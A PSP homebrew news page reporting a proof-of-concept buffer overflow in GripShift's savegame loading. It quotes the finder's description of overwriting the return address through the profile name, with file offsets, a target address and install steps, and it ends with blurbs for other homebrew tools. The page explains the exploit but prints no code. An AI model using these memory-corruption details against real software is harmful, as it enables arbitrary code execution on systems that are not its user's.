Aah, yes, new exploit, old game. It's so cool to actually see this beauty working - and on a PSP-3000 no less! The PSP scene was buzzing the other day when MaTiAz found an exploit (read: buffer overflow!) in the three year old game, GripShift.
MaTiAz says that they've yet to find any further use for this, but it's still a new exploit. It could lead to further hacks, and for now, it's merely a proof of concept. Be that as it may, this is a great start, and a rather sweet find! Here's MaTiAz explaining the exploit:
GripShift has a buffer overflow vulnerability when loading savegames. The savegame contains the profile name which can be easily used to overwrite $ra. The savegame file is pretty big (25kB) so you have lots of space to put your code there. I wrote a simple blob of code to paint the framebuffer completely white (to just indicate that arbitrary code is running ). The return address is located at offset 0xA9 in the file. In this poc it points to 0x08E4CD50 (which is only a few bytes after the return address), and the code starts at 0xCC in the file.
It was tested on 4.01M33-2 with US version of GripShift (ULUS10040), and psplink.prx, usbhostfs.prx and deemerh.prx loaded (also without psplink and usbhostfs). The decrypted savegame (sorry, couldn't [be bothered to] get Shine's savegame tool working so it's in plaintext form) is in the SDDATA.BIN form which Hellcat's Savegame-Deemer produces (thanks to him, if the program didn't exist I wouldn't have bothered with this. ). Just copy the ULUS10040SAVE00 directory to /PSP/SAVEPLAIN/ and run the game. EDIT: yeah, don't forget to have Savegame-Deemer working, duh.
Like it? Share with your friends!
If you got an error while installing Themes, Software or Games, please, read FAQ.
Similar Software:
Flash Spacer Flash Spacer
from alex_e:
Updated to V2.7
Flash Spacer V2.7 By alex_e
A BIG THANKS TO ANGELSNIPER45 FOR TESTING THIS APP ON HIS SLIM.
Tested on 5.00m33-4 on a psp phat and a psp slim (2001) with 5.00m33-6
This application removes and back-ups certain files in flash0
Generic Flasher Generic Flasher
Well, look what we have here. Slasher from Team Duck has dropped by our forums to share with us his Generic Flasher that basically flashes whatever your file you may want to... er... flash. So, here's how it works.
According to Slasher, this applicatin is for just about any custom firmware version, including 3.03 OE-C and 3.10 OE-A
CFW M33 6.20 plugin with Go!Cam support CFW M33 6.20 plugin with Go!Cam support
Homebrew coder Torky has released a new version of his M33 6.20 plugin, a nifty app that allows you to play 6.20 firmware games on your beloved custom firmware M33. The latest update of the homebrew has added support for the PSP-450, the infamous black Go!Cam bundled with Invizimals
GTA:LCS .IMG Extractor Beta GTA:LCS .IMG Extractor Beta
Out of nowhere, homebrew coder Dustcrazy suddenly released pet application GTA: LCS .IMG Extractor Beat v1.0.1. Need we say more? Well, for the learned ones, we guess the name of the program itself is pretty much self-explanatory. but for those who are quite new to this, let us continue
Hello World Application for 2.0-2.80 PSP's Hello World Application for 2.0-2.80 PSP's
This download contains the necessary .tiff picture to execute the "hello world" application on a tiff-enabled PSP (up to 2.80). Just extract the file to your photo directory of your memory stick and launch it on your PSP
Slim Colors Patch Slim Colors Patch
from Bubbletune:
This plugin only has use on Classic PSP's
An update to my previous plugin, Slim Waves Patch.
Thanks to Davee for testing.
Changes:
- Now supports 3.90, 4.01 and 5.00
- Name changed to 'Slim Colors Patch'
- Abandoned full version of the plugin
Instructions:
- Obtain 13-27.bmp and flash it to flash0:/vsh/resource
Hot Shots Golf 2 exploit Homebrew coder wololo's crafted savegame exploit to run Half Byte Loader on the PSP and PSP Go using Hot Shots Golf Open Tee 2
Universal 3.50 HEN/Downgrader Universal 3.50 HEN/Downgrader
It was just yesterday when we heard the latest update on the FW 3.50 downgrader, directly from Fanjita and the Noobz team. It was mentioned that they already have a Korean Lumines UMD and are currently working to make the program compatible to it.
They said that the release was soon but little did we know that it's going to be today
Unofficial REBUG Updater Unofficial REBUG Updater - Attention all REBUG users! Do you want a 4.55 spoof made just for you? Click right here!
bitsbubba of PSX-Scene is back to share a new all-in-one spoofer for REBUG users that still want the 4.55 treatment
rGameboot source code rGameboot source code
Aside from making custom firmwares IE-x, homebrew developer becus25 is also known for application rGameboot. In case you haven't heard about this before, rGameboot stands for Random Gameboot and it allows users to, well, randomized their gameboots.
Now, becus25 just released the source code for the rGameboot
Comments on GripShift savegame exploit POC:
Comments not found
If you noted an error or download link is broken, please, report it via this page or use comments.
Please, select device to check if GripShift savegame exploit POC supports it
